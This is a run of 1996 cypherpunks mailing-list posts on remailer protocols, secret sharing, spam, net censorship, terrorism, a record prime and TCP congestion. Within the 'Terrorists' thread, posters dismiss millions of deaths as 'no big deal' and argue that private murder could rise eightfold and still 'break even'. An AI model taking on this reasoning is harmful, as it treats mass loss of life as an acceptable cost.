Alice thought she was distributing Y with Carol, and that Bob thought he
was also distributing Y with Dave. If they did not split the secrets
themselves, they may not have any knowledge of X's existence. Also, if any
one of the participants gets shut down, it's still possible to retrieve X,
Y and R by using different combinations of the remaining three
participants. This scenario could be extended to more participants and
secrets. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Tue, 10 Sep 1996 07:20:23 +0800
To: perry@piermont.com
Subject: Re: talker
Message-ID: <199609091814.OAA03889@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


sure sounds like it. is it possible that there could be two such as this?

	-paul

> From cypherpunks-errors@toad.com Sun Sep  8 03:04:36 1996
> X-Authentication-Warning: jekyll.piermont.com: Host perry@localhost didn't use HELO protocol
> To: doom13@juno.com (Floyd W Odom)
> Cc: cypherpunks@toad.com
> Subject: Re: talker 
> Reply-To: perry@piermont.com
> X-Reposting-Policy: redistribute only with permission
> Date: Sat, 07 Sep 1996 23:40:18 -0400
> From: "Perry E. Metzger" <perry@piermont.com>
> Sender: owner-cypherpunks@toad.com
> Content-Length: 255
> 
> 
> Floyd W Odom writes:
> > 	I am doom13. If there is anyone out there who is a hacker or
> > would like to be one you can talk to me and find out stuff like cracking.
> > Just drop a message at doom13@juno.com.
> 
> Are you the same jerk who was posting a week ago?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Mon, 9 Sep 1996 23:20:06 +0800
To: Jon Lebkowsky <jonl@well.com>
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <2.2.32.19960909115015.0070caf0@mail.well.com>
Message-ID: <Pine.LNX.3.94.960909141342.18527B-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



> Wellll...there is the rule about speech which endangers; "fire in a crowded
> theatre" is the cliche-example. What could a terrorist SAY that would
> endanger? 

Hmm most groups gain support and new members ('followers') by 'words'.
(Although some may get that by their actions.)

> Personally, I'd rather have terrorists building html than bombs.

Yep, me too, but ....

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Tue, 10 Sep 1996 09:36:53 +0800
To: NetSurfer <cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <1.5.4.32.19960909182501.00685618@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



>If you know a valid email address on the spammers system you can always 
>bounce each message back to them.  If enough people turned the messages 
>back on them it might give them the opportunity to experience first hand 
>what its like to receive tons of mail you don't want or need...
>

Ah, but they never do.

Why not? Because spammers _invariably_  forge the return addresses to keep
exactly that from happening. Indeed, Cyber Promo claims it "had an
understanding" with AOL that it could use AOL boxes  or bogus adresses to
keep bounced messages from coming back at them and crashing their server.
Deliberatlely forging addresses, Cyber claims, is entirely legal. AOL says
it's fraud.

Interesting footnote: AOL, of course, is able to trace a lot of the spam it
gets. It has sent back thousands of messages at once to Cyber which, in
turn, has gotten it bumped from several ISPs once their servers crashed as a
result.

Tough business, huh?

Will Rodger
Washington Bureau Chief
Inter@ctive Week
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjSGvTqp6Cc7rRIJAQHCEQP/fZwhp/GTSwj9Emusgh9QFnAlafpOL2qI
ces6RqwSoZfmbAmhREh836sakjS2d+mHdYK84FH7WdXWnuzMlDAPCls7OO8AU4t8
oMN7koLM3cpgwlavt/Lw8NJp3wC5OnRnrqNeunkBvNEBs8aaJ+C6isH/zrErgbt5
0QL9cYlEyq8=
=EW/y
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 10:51:23 +0800
To: cypherpunks@toad.com
Subject: Re: China joins Singapore, Germany, ....
Message-ID: <2.2.32.19960909182906.008a8378@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:03 AM 9/9/96 -0700, Timothy C. May wrote:
>
>CNN is presenting coverage of China's decision to pull the plug on more
>than 100 sites, and issuing a list of sites which are illegal to connect
>to.
>
>(Net censorship is getting to be a big story....when the list of countries
>reaches 15, it will of course no longer be news. And when the United States
>block access, this will all be transmogrified into an "Anti-Terrorist
>Action.")

Course there hasn't really been much net censorship.  Germany and China's
attempts have not been effective.  The Feds lack a mechanism for "blocking
sites."  There is no one in a position to give such an order.  There is no
chance that such an order would be obeyed in any widespread way in any case.
Outlaw boards crackdowns didn't diminish the number of outlaw boards.  Porno
boards crackdowns did not diminish the number of porno boards.  Since it is
easier to create a site than it is to set up a board, legal maneuvers by the
Feds won't work.

Making sites "illegal to connect to" is meaningless because most users won't
even know what is on the list and most of those who do will be encouraged to
connect to them rather than discouraged.

Meanwhile the most dangerous sites are not ones on any banned list but the
simple sites individuals put up for their hobbies and businesses which get
them used to the networked world and get them used to independent thought
and action.  To being actors rather than passive consumers.  Questioning,
building, developing a sense of their own powers.  Soaking up the
libertarian culture of the nets through their skins without even noticing it.  

More dangerous than fulminate of mercury.

DCF

"If people do lots of things they get used to doing lots of things.  If
people make lots of choices they get used to making lots of choices.  If
people get used to doing and choosing pretty soon they get used to being
free without even noticing it."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 07:23:52 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960909182912.008bf55c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 AM 9/9/96 -0500, Adam Shostack wrote:
>Stephan Schmidt wrote:
>
>| One thought : How many of you would support terrorist
>| web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
>
>I've given support to at least two terrorist organization, probably
>closer to five in the last year.  I can't see supporting one more
>would do any more harm.
>
>Adam


And I support a terrorist organization (the US Government) every year
whether I want to or not.  The US was convicted of a major violation of
international law (akin to terrorism) in the International Court of Justice
back in the '80s for air sowing mines in Nicaragua's main harbor. 

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 09:22:11 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960909182918.008a40e0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:49 AM 9/9/96 -0700, Timothy C. May wrote:
>I don't worry overmuch about a few thousand or even a few million people
>dying as a result of something we have had an influence on developing,
>anymore than the developers of many technologies need to worry about how
>others use their technologies.
>
>And the net effect of crypto anarchy is to destabilize and marginalize
>central governments, which is a net positive effect. If some eggs get
>broken in the process, the biological imperative will generate more eggs.
>No big deal.

Particularly since governments murdered 160 million in the last 100 years
while we civilians have only managed to murder a paltry 20 million or fewer.
A savings of 160 million deaths leaves a lot of room for a non-harmful
increase in private murder.  We could increase the private murder rate by 8
to 10 times and still break even.  

Note too that most terrorism is aimed at governments (even if practiced on
civilians).  In the absence of government, terrorist incentives may be reduced.

DCF

"I don't know if we ought to trust governments with the Net, they might use
it to nuke Hiroshima or conquer Europe or something."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 07:03:23 +0800
To: cypherpunks@toad.com
Subject: Crypto Anachy MUD
Message-ID: <2.2.32.19960909183805.008b9c70@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone make the point (I gave up on the thread) that we already have a
great Crypto Anarchy MUD with lots of the coding already done.  We call it
the Internet.  Digital cash, strong crypto, remailers, everything.

I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 10 Sep 1996 10:51:19 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: strengthening remailer protocols
In-Reply-To: <v03007817ae5963e47e23@[206.170.115.3]>
Message-ID: <Pine.SUN.3.95.960909120620.4743A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Sep 1996, Lance Cottrell wrote:

> Mixmaster prevents replay, so flooding multiple copies of a single message
> will not work. This is the reason Mixmaster has no reply block feature. I
> can see two ways in which replies can work safely.

How about a combination of the two?  Suppose Alice wants to anonymously
post a message and get replies.  She generates a new RSA key, signs her
post with it, and asks readers to send encrypted replies to a server. 
Then periodicly she sends a one-time reply block to the server to retrieve
the accumulated replies. 

This would let Alice receive an unbounded number of replies and also give
some protection against the denial-of-service and rubber-hose attacks
Lance described.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 10 Sep 1996 10:37:18 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: papers on anonymous protocols
Message-ID: <Pine.SUN.3.95.960909145739.28990B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I found a couple of papers on anonymous protocols that I haven't seen
mentioned here before.  I'll list them for people who might be interested:

   Cryptographic Defense Against Traffic Analysis by Rackoff and Simon.
   http://pct.microsoft.com/papers/ta.ps

gives a proof of security for a mix-net like protocol.

   A. Pfitzmann, B. Pfitzmann, M. Waidner: ISDN-MIXes - Untraceable
   Communication with Very Small Bandwidth Overhead; Proc. Kommunikation
   in verteilten Systemen, Feb. 1991, Mannheim, Informatik-Fachberichte
   267, Springer-Verlag, Heidelberg 1991, 451-463.

describes a protocol for anonymous telephone calls.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Sep 1996 14:20:10 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <56mZTD63w165w@bwalk.dm.com>
Message-ID: <32349A90.51BD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> "Douglas B. Renner" <dougr@skypoint-gw.globelle.com> writes:
> with the investigation. Remember the World Trade Center investigation?
> They knew immediately what type of vehicle the blast was in - but they
> deliberately gave false information to the media.  They said they were
> looking into a blue stationwagon or some such BS, and the culprits 
> believed it!  Federal agents staked out the rental agency where the 
> _van_ was rented from and caught one of the buggers, who thought the 
> investigation was way off track.  Yes!!!

> I recall that the perp rented the vehicle and gave a $400 cash
> deposit.
> He subsequently returned to the rental agency, stated that the vehicle
> was stolen, and demanded his cash back. And the Oklahoma City perp was
> caught speeding with no licence plates.

> Shit. Whoever recruits those terrorists needs a better h.r. department 
> to screen for stupidity. :-)
> thread is relevant.  Fortunately this forum reaches some of the most
> intelligent and well-informed minds on the net.

> Why, thank you!
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013,
> 14.4Kbps

Per the tendency of federal agencies to let it be publicly known that 
they lie openly to trap suspects (and apparently this technique has been 
OK'd for local enforcement as well):

This is going to backfire on them (and us), and probably has already.
If govt. protects its "sources and methods", however nefarious, to the 
extent that the public is never asked to assent to these methods (even 
though a few of us know about them anyway), then the public doesn't have 
to become overtly cynical about what's going on.

On the other hand, whether you think the people have this much right to 
know or not, when the public consciousness embraces the concept that the 
police openly and regularly lie (and that it's a "good thing" they do), 
the result will be greater public cynicism, distrust, paranoia, hatred, 
and anarchy (the bad kind).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 10 Sep 1996 10:44:37 +0800
To: kamml@secret.org
Subject: RE: What is the EFF doing exactly?
Message-ID: <9608098423.AA842308610@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


This may be a hopelessly naive question, but is it possible to refuse payment in
cash? Is it really good for all debts public and private?

James

----------
From:   kamml@secret.org
Sent:   Monday, September 09, 1996 3:23 PM
To:     cypherpunks@toad.com
Subject:        Re: What is the EFF doing exactly?

Fedex will not accept cash in New York City. I have tried to pay cash and been
refused. I have talked to customer service and confirmed that they will not
accept cash in NYC although they will elsewhere.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SPG <tank@xs4all.nl>
Date: Tue, 10 Sep 1996 01:15:18 +0800
To: cypherpunks@toad.com
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <2.2.32.19960908184651.00ac63d4@vertexgroup.com>
Message-ID: <32343DEB.7EA7A383@xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Schmidt wrote:
> 
> September 9th,
> 
> I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_.
> 
> -stephan
> 
> PS: using 3 different routes (accounts).

Yes off course. Read this (from press-release xs4all.nl):

Xs4all Internet will rotate the IP-numbering of the website
www.xs4all.nl
to ensure that it's 3100 userpages will all remain available for any
internet-user.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Barbara Gamble <bgamble@wo0033wp.wo.blm.gov>
Date: Tue, 10 Sep 1996 09:31:13 +0800
To: cypherpunks@toad.com
Subject: Re: Test...sorry about this - Reply - Reply
Message-ID: <s23440da.014@wo0033wp.wo.blm.gov>
MIME-Version: 1.0
Content-Type: text/plain


I subscribed just once, real name. Yep, the Welcome msg is ReallyTrulyFine[M].
 I reallytrulyread it.  High-traffic, though, is relative.  In light of
Z.B.'s post , I thought that maybe I , too, had a mail probem.  Seriously,
thanks for the info.  

>>> Jean-Francois Avon <jf_avon@citenet.net> 09/09 2:26 pm >>>
On  9 Sep 96 at 11:10, Barbara Gamble wrote:

> I got it too.  And since I am a new subscriber, I thought it might
> be the normal traffic.  The Welcome msg *did* say the list is
> high-traffic.  Still, I was aghast--300 all at once, another 100
> just in the last hour.  Is that typical? (Please forgive such a
> question from a newcomer to the list.)

Usually, between 35 and 100 posts a day, most of which I delete.  Did 
you subscribe twice or three times under slightly different names  (but
identical e-mail adresses)?

RTFine Welcome Message, it explains everything you have to know

Hope you'll stay with us.
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultant
    physicists, technologists and engineers
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 10 Sep 1996 12:00:58 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: One Time Reply Blocks (was Re: strengthening remailer protocols)
Message-ID: <199609092316.QAA24498@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Sep 1996, Lance Cottrell wrote:

> Mixmaster prevents replay, so flooding multiple copies of a single message
> will not work. This is the reason Mixmaster has no reply block feature. I
> can see two ways in which replies can work safely.

To paraphrase John Von Neumann, any system which uses reply blocks is in a
state of sin.  By this I mean that if there is a chain pointing at you, a
sufficiently powerful attacker can walk down that chain and find you.

Given that, I will join the state of sin by proposing a mechanism which
will allow Alice to receive a reply from Bob, but change her mind at any
time.  The basic idea is to have a one-time reply block which either Bob or
Alice can send to.  If Alice thinks that too much time has elapsed, and
powerful enemies are walking down her reply block chain, she can send
herself a reply and break the chain.  (She might send a reply thru each
link in the chain to break all the links.)

It also occurs to me that since email addresses are about the same size as
secure symmetric keys, it would be attractive to use real one time pads
instead of symmetric key cyphers for encrypting them.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 10 Sep 1996 10:39:10 +0800
To: cypherpunks@toad.com
Subject: Crypto Num Mum, Hmm
Message-ID: <199609091704.RAA00150@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, September 9, 1996, p. A2. 
 
 
   Computers: Number Crunchers' 1 and Only 
 
 
   It's big. It's beautiful. And it's prime. Computer 
   scientists at Cray Research have discovered the largest 
   known prime number. A prime number, for those of us who 
   have forgotten grade school mathematics, can only be 
   divided by itself and by 1. Smaller primes include 2, 3, 5, 
   7 and 11. The new one, 2^1257787-1, is a bit bigger. 
   Printed out, the 378,632 digit number would take up 12 
   newspaper pages. "We're pretty confident that this is the 
   largest known prime number," said researcher Paul Gage. 
 
   There are an infinite number of primes but they are 
   extremely difficult to find. The newly discovered prime 
   number is of a type known a "Mersenne" prime, named for a 
   17th century French monk and mathematician. It is easier to 
   prove the prime-ness of Mersenne numbers than other primes, 
   thanks to complex mathematical software. 
 
   Cray runs the prime-testing program to search for bugs in 
   its new supercomputers. Gage said the discovery of the 
   prime was a happy byproduct of the process. The new number 
   was discovered during a six-hour run testing a new Cray T94 
   system. 
 
   Prime numbers are useful in the field of cryptography, 
   where they are used to help construct virtually unbreakable 
   codes. The new prime is far larger than those commonly 
   used. Said Gage, "A cryptographer interested in numbers 
   this big wouldn't be talking about it." 
 
   -- John Schwartz 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 10 Sep 1996 11:19:36 +0800
To: stewarts@ix.netcom.com
Subject: Re: Anonymous phone calls (was: What is the EFF doing exactly?)
In-Reply-To: <199609091748.NAA27475@attrh1.attrh.att.com>
Message-ID: <eZkHXDvcwapi@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In your mail, you write:

> At 01:03 PM 9/7/96 CST, roy@scytale.com wrote:

> >Can Telecards be audited for usage?  If a TLA black-bags my $25 Telecard
> >from my wallet, can they reconstruct what calls I made with it?
> 
> Easily.  They get the card number off the card, and then check their
> long distance records for calls made with that card number.

I thought as much.  Does the audit trail extend to local calls too?  (I
suspect it does)
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjSZvxvikii9febJAQHdLQP8DA/xxhnKNZOUex5dp/P4kRgLbgS9HryO
tuR5G4eCnjJsuANxuzuUFrjoRm8jknIOhdnrubcK1fxPwInJdMqWbJ8WDPyJcoCf
5jq4ePpahMa2VUbZRoFOwN86n25l0DHHK8lsWpDQ8y8pg/zqToEyLiUJTUi+RID6
HC5eltYmMJc=
=uj3L
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 10 Sep 1996 11:41:45 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Followup to 9/1 Observer article printed
Message-ID: <Pine.3.89.9609091709.A1064-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Found this on alt.privacy today:


Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

---

From: naughty@scallywag.com (Naughty Boy)
Newsgroups: alt.privacy
Subject: READ TODAY'S OBSERVER ARTICLE - THEY SINK TO THEIR TRUE LEVEL!
Date: Sun, 08 Sep 1996 20:36:47 GMT
Organization: Scallywags of the World
Lines: 20
Message-ID: <32332e5c.4219376@news.u-net.com>
NNTP-Posting-Host: host3.animal.u-net.com
X-Newsreader: Forte Agent .99e/32.227

READ TODAY'S OBSERVER ARTICLE - THEY SINK TO THEIR TRUE LEVEL!

Today, September 8, the Observer publish a follow-up-follow-up article
for their amazing "child porn" expose which so grossly libelled Clive
Feather and Johan Helsingius ... a review of the "first" toddler
CD-ROM... How have the mighty crusaders fallen !  Sic transit gloria
mundi.... Actually, the Observer new technology reporters may have
found their true niche at last - it's a bit egotistic for the reporter
to print such a large picture of himself, though !

Read it all at

http://www.scallywag.com

PS:  Private Eye published an intelligent and amusing commentary on
this whole sorry business recently, and scallywag.com will post it,
but, in deference to PE, not until the current issue goes off sale.

NAUGHTY BOY (The Scallywag)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Tue, 10 Sep 1996 13:32:26 +0800
To: cypherpunks@toad.com
Subject: Re: Conservation Laws, Money, Engines, and Ontology
Message-ID: <199609092229.RAA16420@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Wouldn't the model fit reality better if it were based on biological
analogies instead of the raw physics of energy?

I recognize there's a desire here to put some controls on one's own
equipment ("I don't want to receive spam if I don't want to") and that
physics provides the conceptual lever to argue in favor of the desired
controls. Biological systems are a poor choice for grained control by
people who like to change their minds.

But the Internet really is more like an ecology with its own complex
notion of "emergent order" than a simple physical process that must
obey conservation laws in some narrow fashion. Trees obey physical
conservation laws, but they don't exchange micropayments with soil,
air, and Sun to ensure the balance is preserved. As things get out of
balance, trees die. Other entities flourish.

I can't imagine the mechanism by which very precise access charging
and cost recovery mechanisms would replace the current "free" model.
As we all know, it's not really "free."  Information is published and
made available because the vendor needs to distribute it and finds the
Internet to be a cheap way to make it available.  Many vendors
exchange information and entertainment for your attention to a
commercial message. As long as there are unmetered 'Net resources (and
they're unmetered for a plethora of reasons) you'll never get rid of
free riders.

I think you have to choose between the relatively lawless open world
or an enclave where you bar the door with your favorite security
measures. You allow spam as long as you allow uninvited guests.  And
what is cypherpunks but a continuous party of uninvited guests?

Regarding these micropayment machines, I think it would be interesting
to identify some existing, widely used, real world analogues to them:
how big/small are individual transactions, how much money can you
securely collect, how much does the mechanism cost to deploy and
maintain, how hard is it to attack, etc. Gumball machines? Pop
machines?  Pay phones?  I'm not sure there *is* a real world analogue.

Rick.
smith@sctc.com          secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Tue, 10 Sep 1996 06:47:18 +0800
To: cmcurtin@research.megasoft.com
Subject: Snake-Oil FAQ
Message-ID: <199609091741.NAA09272@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Subject: Snake-Oil FAQ's New Maintainer
From: Rob Rothenburg Walking-Owl <wlkngowl@unix.asb.com>


C. Matthew Curtin <cmcurtin@research.megasoft.com> will be taking-over
the "Snake-Oil FAQ".

I no longer have the time to finish (let alone maintain) it.


- --Rob


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3b
Charset: cp850

iQEVAwUBMjRWPATNlSxdPy6ZAQEnIwf+PXgXNNBZP7ylTfMhugeH8FuFDY/zybNb
poSIWCRUhM7EEndYkuyzaTYC44aE0ltAkiN7HvaqXbExQEmEv34aYTa+u9ISabOK
BOEQdgi8oCHJlQ3R6lBTMWKfpFELpORsjDJbsKt/Gcgef+uInMUG8RF7F3Va40dh
CTar/Nr4Quj/EkkVaY6hkaXsMF0CvWq+cKZmo8KR0v4vPeWEKHskslfgXSpfPR9d
uXYyUVD21HRSG5YTZmdm3PJn3GUvgXuQdz1pooQ+x+u8EXsOFRjAEiaFtMey2DYW
imHub+XewnbS93JGZ+q+J93hHpL2OE8LMQFB8ViUe6K05uj7RBi06Q==
=wMjQ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 12:20:47 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <ae5a0ae81b021004f436@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:16 PM 9/9/96, snow wrote:

>     Then again, the only reason I am not a terrorist is that the government
>hasn't YET defined hate speach directed against the government to be
>terrorism.

Don't be so hasty in saying this.

A couple of months ago Clinton signed some sort of bill having to do with
terrorism, terrorist organizations, funding of same, and deportation of
alien-units suspected of being allied with terrorist organizations. (I seem
to recall another such act being passed in early 1995, so there may be more
than one of these things...)

Given the mounting hysteria about terrorism (by the government, at least),
and given the various laws on the books, I would not be surprised to see
some Web sites prosecuted as "harboring" terrorists terrorist-symps.

If any of you are not citizens of the U.S., and are here on visas, I would
give this some real serious thought. Of course, maybe deportation is a
blessing in disguise.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 10 Sep 1996 11:05:02 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Imminent Death of the Internet, GIF at 11
In-Reply-To: <199609091614.MAA24724@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960909175135.23624A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Remember, though - TCPs initial estimate of the congestion window is 
never less than one packet, large numbers of opening connections can 
still (I think) lead to congestion collapse. It can defnitely get close 
to it.

At one point, when sunsite was getting a few 100k hits a day with only 
one T1 there were times when around 2/3rds of all packets were 
re-transmitted. Jon Crowcroft observed similar problems at some UK links, 
though see Van's article on either ietf or end2end a month or so  back
with the counter argument.

Simon



On Mon, 9 Sep 1996, Perry E. Metzger wrote:

> 
> Martin Minow writes:
> > For several months (years?) Bob Metcalf has been predicting that
> > the Internet will self-destruct from overload. His argument
> > appears to follow one of Gordon Bell's maxims: "anyone can predict
> > the future: all you need is semi-log paper and a ruler." As I
> > understand it, Metcalf's argument is that network load (messages,
> > packets) is growing exponentially, while network bandwidth (fiber
> > capacity, switch performance) is growing linearly. At some point,
> > these two curves cross -- and demand will exceed capacity.
> 
> Except for the following.
> 
> 1) TCP backs off.
> 2) Capacity is growing exponentially.
> 
> Perry
> 
> 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Sep 1996 11:45:33 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Imminent Death of the Internet, GIF at 11
In-Reply-To: <Pine.SUN.3.91.960909175135.23624A-100000@tipper.oit.unc.edu>
Message-ID: <199609092203.SAA25379@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> Remember, though - TCPs initial estimate of the congestion window is 
> never less than one packet, large numbers of opening connections can 
> still (I think) lead to congestion collapse. It can defnitely get close 
> to it.

Sure. TCP, especially without SACK but even with such schemes, more or
less requires an average of no less than one packet per RTT. However,
the other half of what I said is that bandwidth *is* rising.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 9 Sep 1996 20:34:17 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <3233E582.FF6D5DF@systemics.com>
Message-ID: <Pine.WNT.3.95.960909174949.-917231C-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Gary Howland wrote:

> Enzo Michelangeli wrote:
>
> > Perhaps, but defamation is an issue that can't be ignored either,
> > especially if one tries to build systems based on reputation.
> 
> It _is_ an issue that can be ignored - if the "defamer" backs up his
> claims, then fine, the claims can be shown to be valid, otherwise ignore
> those claims.  Simple.

I and you may well choose to do so, but the vast majority of the human
beings believe just anything that is repeated loud and long enough.
Otherwise, nobody would hire PR and pay for advertisement, politicians
wouln't be fedwith taxpayer's money, Bosnians would trade goods instead
of gunshots, etc. I'm personally not interested in conjuring up the latest
utopia for a minoritarian sect of illuminati: I need to live in the real
world, and push for viable solutions that change it for better, now.

Enzo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 10 Sep 1996 10:46:09 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Crypto Num Mum, Hmm
In-Reply-To: <199609091704.RAA00150@pipe2.t2.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960909180122.23624B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


It's kind of tempting to generate the key and certificate using this as q
and the previous largest as p, if only for machismo at keysignings :-)



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........
